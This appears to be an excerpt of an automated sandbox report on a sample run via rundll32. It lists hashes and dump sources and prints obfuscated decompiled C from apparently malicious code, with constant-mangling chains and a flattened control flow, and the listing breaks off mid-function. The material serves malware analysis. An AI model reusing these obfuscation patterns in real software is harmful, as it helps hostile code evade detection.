                                                                                                                          • Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
                                                                                                                          • Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                          • Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E007B0056() {
                                                                                                                          				char _v520;
                                                                                                                          				char _v1040;
                                                                                                                          				char _v1560;
                                                                                                                          				char _v1564;
                                                                                                                          				signed int _v1568;
                                                                                                                          				signed int _v1572;
                                                                                                                          				signed int _v1576;
                                                                                                                          				signed int _v1580;
                                                                                                                          				signed int _v1584;
                                                                                                                          				signed int _v1588;
                                                                                                                          				signed int _v1592;
                                                                                                                          				signed int _v1596;
                                                                                                                          				signed int _v1600;
                                                                                                                          				signed int _v1604;
                                                                                                                          				signed int _v1608;
                                                                                                                          				signed int _v1612;
                                                                                                                          				signed int _v1616;
                                                                                                                          				signed int _v1620;
                                                                                                                          				signed int _v1624;
                                                                                                                          				signed int _v1628;
                                                                                                                          				signed int _v1632;
                                                                                                                          				signed int _v1636;
                                                                                                                          				signed int _v1640;
                                                                                                                          				signed int _v1644;
                                                                                                                          				signed int _v1648;
                                                                                                                          				signed int _v1652;
                                                                                                                          				unsigned int _v1656;
                                                                                                                          				signed int _v1660;
                                                                                                                          				signed int _v1664;
                                                                                                                          				signed int _v1668;
                                                                                                                          				signed int _v1672;
                                                                                                                          				signed int _v1676;
                                                                                                                          				signed int _v1680;
                                                                                                                          				signed int _v1684;
                                                                                                                          				signed int _v1688;
                                                                                                                          				signed int _v1692;
                                                                                                                          				signed int _v1696;
                                                                                                                          				signed int _v1700;
                                                                                                                          				signed int _v1704;
                                                                                                                          				signed int _v1708;
                                                                                                                          				signed int _v1712;
                                                                                                                          				signed int _v1716;
                                                                                                                          				signed int _v1720;
                                                                                                                          				signed int _v1724;
                                                                                                                          				signed int _v1728;
                                                                                                                          				signed int _v1732;
                                                                                                                          				signed int _v1736;
                                                                                                                          				signed int _v1740;
                                                                                                                          				signed int _v1744;
                                                                                                                          				signed int _v1748;
                                                                                                                          				void* _t500;
                                                                                                                          				void* _t502;
                                                                                                                          				intOrPtr* _t509;
                                                                                                                          				void* _t513;
                                                                                                                          				signed int _t522;
                                                                                                                          				intOrPtr _t523;
                                                                                                                          				intOrPtr* _t524;
                                                                                                                          				signed int _t525;
                                                                                                                          				signed int _t526;
                                                                                                                          				signed int _t527;
                                                                                                                          				signed int _t528;
                                                                                                                          				signed int _t529;
                                                                                                                          				signed int _t530;
                                                                                                                          				signed int _t531;
                                                                                                                          				signed int _t532;
                                                                                                                          				signed int _t533;
                                                                                                                          				signed int _t534;
                                                                                                                          				signed int _t535;
                                                                                                                          				signed int _t536;
                                                                                                                          				signed int _t537;
                                                                                                                          				signed int _t538;
                                                                                                                          				signed int _t539;
                                                                                                                          				void* _t540;
                                                                                                                          				void* _t546;
                                                                                                                          				intOrPtr _t556;
                                                                                                                          				void* _t603;
                                                                                                                          				signed int _t605;
                                                                                                                          				signed int* _t609;
                                                                                                                          
                                                                                                                          				_t609 =  &_v1748;
                                                                                                                          				_v1648 = 0xded5e0;
                                                                                                                          				_v1648 = _v1648 >> 0xb;
                                                                                                                          				_v1648 = _v1648 | 0x3a1a97de;
                                                                                                                          				_v1648 = _v1648 ^ 0x3a1a9ff7;
                                                                                                                          				_v1608 = 0x6694ca;
                                                                                                                          				_v1608 = _v1608 | 0xdc2b4f48;
                                                                                                                          				_v1608 = _v1608 ^ 0x5c6fdfcb;
                                                                                                                          				_v1712 = 0x53f825;
                                                                                                                          				_v1712 = _v1712 >> 2;
                                                                                                                          				_v1712 = _v1712 ^ 0x4e440c95;
                                                                                                                          				_v1712 = _v1712 | 0x7235b0e7;
                                                                                                                          				_v1712 = _v1712 ^ 0x7e75f2fd;
                                                                                                                          				_v1632 = 0xc6d169;
                                                                                                                          				_v1568 = 0;
                                                                                                                          				_t603 = 0x9805d0a;
                                                                                                                          				_t525 = 0x52;
                                                                                                                          				_v1632 = _v1632 / _t525;
                                                                                                                          				_t526 = 0x67;
                                                                                                                          				_v1632 = _v1632 * 0x1e;
                                                                                                                          				_v1632 = _v1632 ^ 0x0048bcfb;
                                                                                                                          				_v1596 = 0x189afb;
                                                                                                                          				_v1596 = _v1596 >> 0xe;
                                                                                                                          				_v1596 = _v1596 ^ 0x000d7c1d;
                                                                                                                          				_v1724 = 0x4bfed1;
                                                                                                                          				_v1724 = _v1724 * 0x63;
                                                                                                                          				_v1724 = _v1724 * 0x55;
                                                                                                                          				_v1724 = _v1724 >> 1;
                                                                                                                          				_v1724 = _v1724 ^ 0x61069d5d;
                                                                                                                          				_v1580 = 0x401b2b;
                                                                                                                          				_v1580 = _v1580 + 0x7090;
                                                                                                                          				_v1580 = _v1580 ^ 0x00412b45;
                                                                                                                          				_v1672 = 0xbaa782;
                                                                                                                          				_v1672 = _v1672 / _t526;
                                                                                                                          				_v1672 = _v1672 << 2;
                                                                                                                          				_v1672 = _v1672 ^ 0x000e5528;
                                                                                                                          				_v1624 = 0x1efbce;
                                                                                                                          				_t527 = 0x4f;
                                                                                                                          				_v1624 = _v1624 / _t527;
                                                                                                                          				_v1624 = _v1624 ^ 0x000dc160;
                                                                                                                          				_v1572 = 0x9ef416;
                                                                                                                          				_t605 = 0x62;
                                                                                                                          				_v1572 = _v1572 / _t605;
                                                                                                                          				_v1572 = _v1572 ^ 0x00079814;
                                                                                                                          				_v1612 = 0x4efe15;
                                                                                                                          				_t528 = 0x43;
                                                                                                                          				_v1612 = _v1612 / _t528;
                                                                                                                          				_v1612 = _v1612 ^ 0x000e5446;
                                                                                                                          				_v1640 = 0x94326d;
                                                                                                                          				_t529 = 0x77;
                                                                                                                          				_v1640 = _v1640 / _t529;
                                                                                                                          				_t530 = 0x35;
                                                                                                                          				_v1640 = _v1640 / _t530;
                                                                                                                          				_v1640 = _v1640 ^ 0x000d83b8;
                                                                                                                          				_v1676 = 0x511d41;
                                                                                                                          				_t531 = 9;
                                                                                                                          				_v1676 = _v1676 * 0x76;
                                                                                                                          				_v1676 = _v1676 ^ 0xeef8e480;
                                                                                                                          				_v1676 = _v1676 ^ 0xcb952f57;
                                                                                                                          				_v1708 = 0x4e0a18;
                                                                                                                          				_v1708 = _v1708 ^ 0x2110c6ad;
                                                                                                                          				_v1708 = _v1708 | 0x4a7f48ac;
                                                                                                                          				_v1708 = _v1708 + 0xffff2cb4;
                                                                                                                          				_v1708 = _v1708 ^ 0x6b758b76;
                                                                                                                          				_v1732 = 0x7a6741;
                                                                                                                          				_t123 =  &_v1732; // 0x7a6741
                                                                                                                          				_v1732 =  *_t123 / _t531;
                                                                                                                          				_v1732 = _v1732 << 0xe;
                                                                                                                          				_v1732 = _v1732 << 7;
                                                                                                                          				_v1732 = _v1732 ^ 0x36245548;
                                                                                                                          				_v1700 = 0x42788;
                                                                                                                          				_t532 = 0x44;
                                                                                                                          				_v1700 = _v1700 / _t532;
                                                                                                                          				_v1700 = _v1700 | 0xce808109;
                                                                                                                          				_v1700 = _v1700 + 0xffff7a0f;
                                                                                                                          				_v1700 = _v1700 ^ 0xce88d2ed;
                                                                                                                          				_v1740 = 0x39c25c;
                                                                                                                          				_v1740 = _v1740 + 0xf71;
                                                                                                                          				_t533 = 0x75;
                                                                                                                          				_v1740 = _v1740 / _t533;
                                                                                                                          				_v1740 = _v1740 ^ 0xc60840fd;
                                                                                                                          				_v1740 = _v1740 ^ 0xc60d36f5;
                                                                                                                          				_v1716 = 0x2bcc6c;
                                                                                                                          				_v1716 = _v1716 + 0x97be;
                                                                                                                          				_v1716 = _v1716 >> 0xd;
                                                                                                                          				_v1716 = _v1716 ^ 0xcb020dbc;
                                                                                                                          				_v1716 = _v1716 ^ 0xcb05808e;
                                                                                                                          				_v1604 = 0x3f7ac0;
                                                                                                                          				_v1604 = _v1604 + 0xafc6;
                                                                                                                          				_v1604 = _v1604 ^ 0x0048c4ef;
                                                                                                                          				_v1576 = 0x9f011d;
                                                                                                                          				_v1576 = _v1576 ^ 0x8bb25c52;
                                                                                                                          				_v1576 = _v1576 ^ 0x8b2a60ae;
                                                                                                                          				_v1684 = 0xe4045e;
                                                                                                                          				_v1684 = _v1684 * 0x42;
                                                                                                                          				_v1684 = _v1684 * 0xc;
                                                                                                                          				_v1684 = _v1684 ^ 0xc16ccb70;
                                                                                                                          				_v1720 = 0x76be5;
                                                                                                                          				_v1720 = _v1720 >> 0xd;
                                                                                                                          				_v1720 = _v1720 * 0x3b;
                                                                                                                          				_v1720 = _v1720 + 0xffffaa4e;
                                                                                                                          				_v1720 = _v1720 ^ 0xfff1ea6d;
                                                                                                                          				_v1680 = 0x1fb4c3;
                                                                                                                          				_v1680 = _v1680 << 4;
                                                                                                                          				_v1680 = _v1680 << 0xc;
                                                                                                                          				_v1680 = _v1680 ^ 0xb4c6c556;
                                                                                                                          				_v1644 = 0xb0dbcd;
                                                                                                                          				_v1644 = _v1644 << 0xf;
                                                                                                                          				_v1644 = _v1644 << 0x10;
                                                                                                                          				_v1644 = _v1644 ^ 0x800a09c5;
                                                                                                                          				_v1600 = 0x1a67e8;
                                                                                                                          				_v1600 = _v1600 | 0xeb4b5744;
                                                                                                                          				_v1600 = _v1600 ^ 0xeb54c7c0;
                                                                                                                          				_v1652 = 0x1784b1;
                                                                                                                          				_v1652 = _v1652 >> 0xf;
                                                                                                                          				_v1652 = _v1652 << 6;
                                                                                                                          				_v1652 = _v1652 ^ 0x00082079;
                                                                                                                          				_v1660 = 0xec7770;
                                                                                                                          				_v1660 = _v1660 + 0xb190;
                                                                                                                          				_v1660 = _v1660 | 0x400c0cca;
                                                                                                                          				_v1660 = _v1660 ^ 0x40ee2104;
                                                                                                                          				_v1668 = 0xfc9259;
                                                                                                                          				_v1668 = _v1668 + 0xffffc6b7;
                                                                                                                          				_v1668 = _v1668 >> 0xe;
                                                                                                                          				_v1668 = _v1668 ^ 0x000f272a;
                                                                                                                          				_v1704 = 0xff7fae;
                                                                                                                          				_v1704 = _v1704 + 0xffff711f;
                                                                                                                          				_v1704 = _v1704 + 0xffff4b94;
                                                                                                                          				_v1704 = _v1704 | 0x5a3393fe;
                                                                                                                          				_v1704 = _v1704 ^ 0x5af53198;
                                                                                                                          				_v1616 = 0x130067;
                                                                                                                          				_t534 = 0x4e;
                                                                                                                          				_v1616 = _v1616 / _t534;
                                                                                                                          				_v1616 = _v1616 ^ 0x00057283;
                                                                                                                          				_v1628 = 0x10552;
                                                                                                                          				_v1628 = _v1628 + 0xf3cd;
                                                                                                                          				_v1628 = _v1628 + 0x9e6e;
                                                                                                                          				_v1628 = _v1628 ^ 0x00033ec8;
                                                                                                                          				_v1636 = 0x95cc92;
                                                                                                                          				_v1636 = _v1636 >> 0xf;
                                                                                                                          				_v1636 = _v1636 + 0x9761;
                                                                                                                          				_v1636 = _v1636 ^ 0x000e6713;
                                                                                                                          				_v1748 = 0xd7b406;
                                                                                                                          				_t535 = 0x31;
                                                                                                                          				_v1748 = _v1748 * 0x46;
                                                                                                                          				_v1748 = _v1748 << 1;
                                                                                                                          				_v1748 = _v1748 + 0x479a;
                                                                                                                          				_v1748 = _v1748 ^ 0x75ff50ef;
                                                                                                                          				_v1584 = 0xe29275;
                                                                                                                          				_v1584 = _v1584 * 0x6d;
                                                                                                                          				_v1584 = _v1584 ^ 0x607f0d3c;
                                                                                                                          				_v1664 = 0xc2b99a;
                                                                                                                          				_v1664 = _v1664 / _t605;
                                                                                                                          				_v1664 = _v1664 | 0xc7d1021c;
                                                                                                                          				_v1664 = _v1664 ^ 0xc7dc1815;
                                                                                                                          				_v1692 = 0xa5d2da;
                                                                                                                          				_v1692 = _v1692 * 0x17;
                                                                                                                          				_v1692 = _v1692 / _t535;
                                                                                                                          				_t536 = 0x23;
                                                                                                                          				_v1692 = _v1692 * 0x3a;
                                                                                                                          				_v1692 = _v1692 ^ 0x11a891cb;
                                                                                                                          				_v1656 = 0x680db3;
                                                                                                                          				_v1656 = _v1656 >> 6;
                                                                                                                          				_v1656 = _v1656 >> 5;
                                                                                                                          				_v1656 = _v1656 ^ 0x000507e8;
                                                                                                                          				_v1728 = 0x12970f;
                                                                                                                          				_v1728 = _v1728 + 0xffffbe66;
                                                                                                                          				_v1728 = _v1728 >> 6;
                                                                                                                          				_v1728 = _v1728 / _t536;
                                                                                                                          				_v1728 = _v1728 ^ 0x00053169;
                                                                                                                          				_v1620 = 0xa87d1b;
                                                                                                                          				_v1620 = _v1620 + 0xc3ba;
                                                                                                                          				_v1620 = _v1620 ^ 0x00a7b1ac;
                                                                                                                          				_v1736 = 0xb206b7;
                                                                                                                          				_v1736 = _v1736 ^ 0x6f4eb888;
                                                                                                                          				_t537 = 0x5d;
                                                                                                                          				_v1736 = _v1736 / _t537;
                                                                                                                          				_v1736 = _v1736 + 0x173b;
                                                                                                                          				_v1736 = _v1736 ^ 0x013191a0;
                                                                                                                          				_v1744 = 0xbf67a7;
                                                                                                                          				_t538 = 0x70;
                                                                                                                          				_v1744 = _v1744 / _t538;
                                                                                                                          				_v1744 = _v1744 | 0x1279871b;
                                                                                                                          				_v1744 = _v1744 ^ 0x04c3b9b8;
                                                                                                                          				_v1744 = _v1744 ^ 0x16b0fef0;
                                                                                                                          				_v1588 = 0x7bc48a;
                                                                                                                          				_v1588 = _v1588 << 7;
                                                                                                                          				_v1588 = _v1588 ^ 0x3de90636;
                                                                                                                          				_v1688 = 0x5dc5eb;
                                                                                                                          				_v1688 = _v1688 >> 0xb;
                                                                                                                          				_v1688 = _v1688 + 0xaf87;
                                                                                                                          				_t539 = 0x6c;
                                                                                                                          				_t522 = _v1568;
                                                                                                                          				_v1688 = _v1688 * 0x63;
                                                                                                                          				_v1688 = _v1688 ^ 0x004fac27;
                                                                                                                          				_v1696 = 0x311285;
                                                                                                                          				_v1696 = _v1696 << 0xb;
                                                                                                                          				_v1696 = _v1696 ^ 0x3061b352;
                                                                                                                          				_v1696 = _v1696 / _t539;
                                                                                                                          				_v1696 = _v1696 ^ 0x01b73771;
                                                                                                                          				_v1592 = 0x977507;
                                                                                                                          				_v1592 = _v1592 | 0xf9843f0d;
                                                                                                                          				_v1592 = _v1592 ^ 0xf99a58c3;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t540 = 0x5c;
                                                                                                                          					while(1) {
                                                                                                                          						L2:
                                                                                                                          						_t500 = 0x8167d85;
                                                                                                                          						do {
                                                                                                                          							L3:
                                                                                                                          							if(_t603 == 0x2c7b186) {
                                                                                                                          								E00791FD1(_v1688, _v1696, _v1592, _v1564);
                                                                                                                          								_t603 = 0xcf98960;
                                                                                                                          								goto L18;
                                                                                                                          							} else {
                                                                                                                          								if(_t603 == 0x33b45b1) {
                                                                                                                          									_push(_v1680);
                                                                                                                          									_push(_v1720);
                                                                                                                          									_t502 = E007ADCF7(_v1684, 0x791080, __eflags);
                                                                                                                          									_pop(_t546);
                                                                                                                          									__eflags = E0079AAD6(_t502, _v1644, _v1600, _v1608, _t546, _t546, _v1652, _v1660, _v1668, _t546,  &_v1564, _v1704, _t546, _v1712, _t546, _v1616);
                                                                                                                          									_t603 =  ==  ? 0x8167d85 : 0xcf98960;
                                                                                                                          									E0079A8B0(_v1628, _t502, _v1636);
                                                                                                                          									_t609 =  &(_t609[0xf]);
                                                                                                                          									L18:
                                                                                                                          									_t500 = 0x8167d85;
                                                                                                                          									_t540 = 0x5c;
                                                                                                                          								} else {
                                                                                                                          									if(_t603 == _t500) {
                                                                                                                          										_t509 = E0079F002(2 + E0079CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2, _v1728, _t522, 2 + E0079CB52(_v1748,  &_v1560, _v1584, _v1664, _v1692) * 2,  &_v1560, _v1620, _v1736, _v1632, _v1744, _v1588, _v1564);
                                                                                                                          										_t609 =  &(_t609[0xd]);
                                                                                                                          										__eflags = _t509;
                                                                                                                          										_t603 = 0x2c7b186;
                                                                                                                          										_v1568 = 0 | __eflags == 0x00000000;
                                                                                                                          										goto L1;
                                                                                                                          									} else {
                                                                                                                          										if(_t603 == 0x9805d0a) {
                                                                                                                          											_push(_v1672);
                                                                                                                          											_push(_v1648);
                                                                                                                          											_push(_v1580);
                                                                                                                          											_push( &_v520);
                                                                                                                          											E007A46BB(_v1596, _v1724);
                                                                                                                          											_t609 = _t609 - 0xc + 0x1c;
                                                                                                                          											_t603 = 0xc81d40c;
                                                                                                                          											while(1) {
                                                                                                                          												L1:
                                                                                                                          												_t540 = 0x5c;
                                                                                                                          												goto L2;
                                                                                                                          											}
                                                                                                                          										} else {
                                                                                                                          											if(_t603 == 0xaea35f7) {
                                                                                                                          												_t523 =  *0x7b3e10; // 0x0
                                                                                                                          												_t524 = _t523 + 0x1c;
                                                                                                                          												while(1) {
                                                                                                                          													__eflags =  *_t524 - _t540;
                                                                                                                          													if(__eflags == 0) {
                                                                                                                          														break;
                                                                                                                          													}
                                                                                                                          													_t524 = _t524 + 2;
                                                                                                                          													__eflags = _t524;
                                                                                                                          												}
                                                                                                                          												_t522 = _t524 + 2;
                                                                                                                          												_t603 = 0x33b45b1;
                                                                                                                          												goto L2;
                                                                                                                          											} else {
                                                                                                                          												_t618 = _t603 - 0xc81d40c;
                                                                                                                          												if(_t603 == 0xc81d40c) {
                                                                                                                          													_push(_v1612);
                                                                                                                          													_push(_v1572);
                                                                                                                          													_t513 = E007ADCF7(_v1624, 0x791020, _t618);
                                                                                                                          													E007A176B( &_v1040, _t618);
                                                                                                                          													_t556 =  *0x7b3e10; // 0x0
                                                                                                                          													_t403 = _t556 + 0x1c; // 0x1c
                                                                                                                          													_t404 = _t556 + 0x23c; // 0x23c
                                                                                                                          													E007A1652(_v1676, _t618, _t404, _t403, _v1708, _v1732, _t513, 0x104,  &_v1560, _v1700,  &_v520, _v1740,  &_v1040, _v1716);
                                                                                                                          													E0079A8B0(_v1604, _t513, _v1576);
                                                                                                                          													_t609 =  &(_t609[0xf]);
                                                                                                                          													_t603 = 0xaea35f7;
                                                                                                                          													while(1) {
                                                                                                                          														L1:
                                                                                                                          														_t540 = 0x5c;
                                                                                                                          														L2:
                                                                                                                          														_t500 = 0x8167d85;
                                                                                                                          														goto L3;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__eflags = _t603 - 0xcf98960;
                                                                                                                          						} while (__eflags != 0);
                                                                                                                          						return _v1568;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          0x007b0728
                                                                                                                          0x007b072e
                                                                                                                          0x007b098a
                                                                                                                          0x007b0991
                                                                                                                          0x00000000
                                                                                                                          0x007b0734
                                                                                                                          0x007b073a
                                                                                                                          0x007b08ea
                                                                                                                          0x007b08f3
                                                                                                                          0x007b08fb
                                                                                                                          0x007b0901
                                                                                                                          0x007b095c
                                                                                                                          0x007b0967
                                                                                                                          0x007b096a
                                                                                                                          0x007b096f
                                                                                                                          0x007b0993
                                                                                                                          0x007b0995
                                                                                                                          0x007b099a
                                                                                                                          0x007b0740
                                                                                                                          0x007b0742
                                                                                                                          0x007b08ca
                                                                                                                          0x007b08d1
                                                                                                                          0x007b08d4
                                                                                                                          0x007b08d6
                                                                                                                          0x007b08de
                                                                                                                          0x00000000
                                                                                                                          0x007b0748
                                                                                                                          0x007b074e
                                                                                                                          0x007b0831
                                                                                                                          0x007b083c
                                                                                                                          0x007b0840
                                                                                                                          0x007b0855
                                                                                                                          0x007b0856
                                                                                                                          0x007b085b
                                                                                                                          0x007b085e
                                                                                                                          0x007b0720
                                                                                                                          0x007b0720
                                                                                                                          0x007b0722
                                                                                                                          0x00000000
                                                                                                                          0x007b0722
                                                                                                                          0x007b0754
                                                                                                                          0x007b075a
                                                                                                                          0x007b0811
                                                                                                                          0x007b0817
                                                                                                                          0x007b081f
                                                                                                                          0x007b081f
                                                                                                                          0x007b0822
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007b081c
                                                                                                                          0x007b081c
                                                                                                                          0x007b081c
                                                                                                                          0x007b0824
                                                                                                                          0x007b0827
                                                                                                                          0x00000000
                                                                                                                          0x007b0760
                                                                                                                          0x007b0760
                                                                                                                          0x007b0766
                                                                                                                          0x007b076c
                                                                                                                          0x007b0778
                                                                                                                          0x007b0786
                                                                                                                          0x007b0794
                                                                                                                          0x007b07cb
                                                                                                                          0x007b07d8
                                                                                                                          0x007b07dc
                                                                                                                          0x007b07ea
                                                                                                                          0x007b07ff
                                                                                                                          0x007b0804
                                                                                                                          0x007b0807
                                                                                                                          0x007b0720
                                                                                                                          0x007b0720
                                                                                                                          0x007b0722
                                                                                                                          0x007b0723
                                                                                                                          0x007b0723
                                                                                                                          0x00000000
                                                                                                                          0x007b0723
                                                                                                                          0x007b0720
                                                                                                                          0x007b0766
                                                                                                                          0x007b075a
                                                                                                                          0x007b074e
                                                                                                                          0x007b0742
                                                                                                                          0x007b073a
                                                                                                                          0x007b099b
                                                                                                                          0x007b099b
                                                                                                                          0x007b09b4
                                                                                                                          0x007b09b4
                                                                                                                          0x007b0723

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Agz$DWK$E+A$g$pw
                                                                                                                          • API String ID: 0-1474679353
                                                                                                                          • Opcode ID: 1e732d5816592925c07cfdc99e7f4acabcc28127065b88e90bec72ecbe0da194
                                                                                                                          • Instruction ID: a6d5aa3242ea2ca583998f15956c3b2f5377a5fbc12e446e17b07a67d05c078a
                                                                                                                          • Opcode Fuzzy Hash: 1e732d5816592925c07cfdc99e7f4acabcc28127065b88e90bec72ecbe0da194
                                                                                                                          • Instruction Fuzzy Hash: 8E32117250C380CFD368CF25C94AA8BFBE2BBC5748F10891DE19986261D7B59949CF46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E0079F09B(void* __ecx) {
                                                                                                                          				char _v520;
                                                                                                                          				char _v1040;
                                                                                                                          				char _v1560;
                                                                                                                          				char _v2080;
                                                                                                                          				char _v2600;
                                                                                                                          				signed int _v2604;
                                                                                                                          				signed int _v2608;
                                                                                                                          				signed int _v2612;
                                                                                                                          				signed int _v2616;
                                                                                                                          				signed int _v2620;
                                                                                                                          				signed int _v2624;
                                                                                                                          				signed int _v2628;
                                                                                                                          				signed int _v2632;
                                                                                                                          				signed int _v2636;
                                                                                                                          				signed int _v2640;
                                                                                                                          				signed int _v2644;
                                                                                                                          				signed int _v2648;
                                                                                                                          				signed int _v2652;
                                                                                                                          				signed int _v2656;
                                                                                                                          				signed int _v2660;
                                                                                                                          				signed int _v2664;
                                                                                                                          				signed int _v2668;
                                                                                                                          				signed int _v2672;
                                                                                                                          				signed int _v2676;
                                                                                                                          				signed int _v2680;
                                                                                                                          				signed int _v2684;
                                                                                                                          				signed int _v2688;
                                                                                                                          				signed int _v2692;
                                                                                                                          				signed int _v2696;
                                                                                                                          				signed int _v2700;
                                                                                                                          				signed int _v2704;
                                                                                                                          				signed int _v2708;
                                                                                                                          				signed int _v2712;
                                                                                                                          				signed int _v2716;
                                                                                                                          				signed int _v2720;
                                                                                                                          				signed int _v2724;
                                                                                                                          				signed int _v2728;
                                                                                                                          				signed int _v2732;
                                                                                                                          				signed int _v2736;
                                                                                                                          				signed int _v2740;
                                                                                                                          				signed int _v2744;
                                                                                                                          				signed int _v2748;
                                                                                                                          				signed int _v2752;
                                                                                                                          				signed int _v2756;
                                                                                                                          				signed int _v2760;
                                                                                                                          				signed int _v2764;
                                                                                                                          				signed int _v2768;
                                                                                                                          				signed int _v2772;
                                                                                                                          				signed int _t425;
                                                                                                                          				signed int _t443;
                                                                                                                          				signed int _t444;
                                                                                                                          				signed int _t445;
                                                                                                                          				signed int _t446;
                                                                                                                          				signed int _t447;
                                                                                                                          				signed int _t448;
                                                                                                                          				signed int _t449;
                                                                                                                          				signed int _t450;
                                                                                                                          				signed int _t451;
                                                                                                                          				signed int _t452;
                                                                                                                          				signed int _t453;
                                                                                                                          				signed int _t458;
                                                                                                                          				void* _t502;
                                                                                                                          				void* _t503;
                                                                                                                          				signed int* _t507;
                                                                                                                          
                                                                                                                          				_t507 =  &_v2772;
                                                                                                                          				_v2628 = 0x98f0ce;
                                                                                                                          				_v2628 = _v2628 >> 0xb;
                                                                                                                          				_v2628 = _v2628 ^ 0x00001337;
                                                                                                                          				_v2696 = 0x96ddc1;
                                                                                                                          				_v2696 = _v2696 + 0xffff0eed;
                                                                                                                          				_v2696 = _v2696 + 0xffffc9f2;
                                                                                                                          				_v2696 = _v2696 ^ 0x009155bb;
                                                                                                                          				_v2748 = 0x5205ca;
                                                                                                                          				_v2748 = _v2748 ^ 0x19402ba5;
                                                                                                                          				_t502 = __ecx;
                                                                                                                          				_t503 = 0xea1969c;
                                                                                                                          				_t443 = 0x43;
                                                                                                                          				_v2748 = _v2748 / _t443;
                                                                                                                          				_t444 = 0xb;
                                                                                                                          				_v2748 = _v2748 / _t444;
                                                                                                                          				_v2748 = _v2748 ^ 0x000a2456;
                                                                                                                          				_v2604 = 0x2f1706;
                                                                                                                          				_t445 = 0x26;
                                                                                                                          				_v2604 = _v2604 * 6;
                                                                                                                          				_v2604 = _v2604 ^ 0x011fcdd9;
                                                                                                                          				_v2684 = 0x108800;
                                                                                                                          				_v2684 = _v2684 >> 0xc;
                                                                                                                          				_v2684 = _v2684 / _t445;
                                                                                                                          				_v2684 = _v2684 ^ 0x00056909;
                                                                                                                          				_v2764 = 0x56ac6f;
                                                                                                                          				_v2764 = _v2764 << 0xe;
                                                                                                                          				_v2764 = _v2764 | 0x24a96f4c;
                                                                                                                          				_t446 = 0x42;
                                                                                                                          				_v2764 = _v2764 / _t446;
                                                                                                                          				_v2764 = _v2764 ^ 0x02abe6d6;
                                                                                                                          				_v2680 = 0xb60c61;
                                                                                                                          				_t447 = 0x16;
                                                                                                                          				_v2680 = _v2680 / _t447;
                                                                                                                          				_v2680 = _v2680 << 7;
                                                                                                                          				_v2680 = _v2680 ^ 0x04229d93;
                                                                                                                          				_v2712 = 0x6d1dcd;
                                                                                                                          				_v2712 = _v2712 | 0x18b294c6;
                                                                                                                          				_v2712 = _v2712 ^ 0xf88c4d23;
                                                                                                                          				_v2712 = _v2712 ^ 0xe07332c4;
                                                                                                                          				_v2612 = 0x9fb2e7;
                                                                                                                          				_v2612 = _v2612 | 0xd190ff6b;
                                                                                                                          				_v2612 = _v2612 ^ 0xd1908c6f;
                                                                                                                          				_v2732 = 0x85d89e;
                                                                                                                          				_v2732 = _v2732 << 5;
                                                                                                                          				_v2732 = _v2732 >> 0xd;
                                                                                                                          				_t448 = 0x37;
                                                                                                                          				_v2732 = _v2732 / _t448;
                                                                                                                          				_v2732 = _v2732 ^ 0x0009f3db;
                                                                                                                          				_v2704 = 0x8a2dac;
                                                                                                                          				_v2704 = _v2704 << 0xd;
                                                                                                                          				_v2704 = _v2704 * 6;
                                                                                                                          				_v2704 = _v2704 ^ 0xa2425f92;
                                                                                                                          				_v2620 = 0x8530c4;
                                                                                                                          				_v2620 = _v2620 | 0x7f36b61d;
                                                                                                                          				_v2620 = _v2620 ^ 0x7fb2adaf;
                                                                                                                          				_v2756 = 0xf61f4c;
                                                                                                                          				_v2756 = _v2756 >> 0xe;
                                                                                                                          				_t449 = 0x4b;
                                                                                                                          				_v2756 = _v2756 / _t449;
                                                                                                                          				_v2756 = _v2756 + 0xffffd188;
                                                                                                                          				_v2756 = _v2756 ^ 0xfff88f11;
                                                                                                                          				_v2660 = 0x7ee31b;
                                                                                                                          				_v2660 = _v2660 | 0xd8d04f1e;
                                                                                                                          				_v2660 = _v2660 ^ 0xd8ffeb88;
                                                                                                                          				_v2672 = 0xc71ff5;
                                                                                                                          				_v2672 = _v2672 >> 0xf;
                                                                                                                          				_v2672 = _v2672 ^ 0x000b63b3;
                                                                                                                          				_v2740 = 0x49f4c1;
                                                                                                                          				_t450 = 0x76;
                                                                                                                          				_v2740 = _v2740 * 0x4b;
                                                                                                                          				_v2740 = _v2740 + 0xffff254a;
                                                                                                                          				_v2740 = _v2740 * 0x48;
                                                                                                                          				_v2740 = _v2740 ^ 0x17c5e1bd;
                                                                                                                          				_v2652 = 0x2197ca;
                                                                                                                          				_v2652 = _v2652 * 0x5a;
                                                                                                                          				_v2652 = _v2652 ^ 0x0bc440cb;
                                                                                                                          				_v2720 = 0x771a3f;
                                                                                                                          				_v2720 = _v2720 >> 0xe;
                                                                                                                          				_v2720 = _v2720 + 0x9ab6;
                                                                                                                          				_v2720 = _v2720 ^ 0x0000c33a;
                                                                                                                          				_v2688 = 0x2271c;
                                                                                                                          				_v2688 = _v2688 / _t450;
                                                                                                                          				_v2688 = _v2688 << 9;
                                                                                                                          				_v2688 = _v2688 ^ 0x0000f5c5;
                                                                                                                          				_v2608 = 0xceafd9;
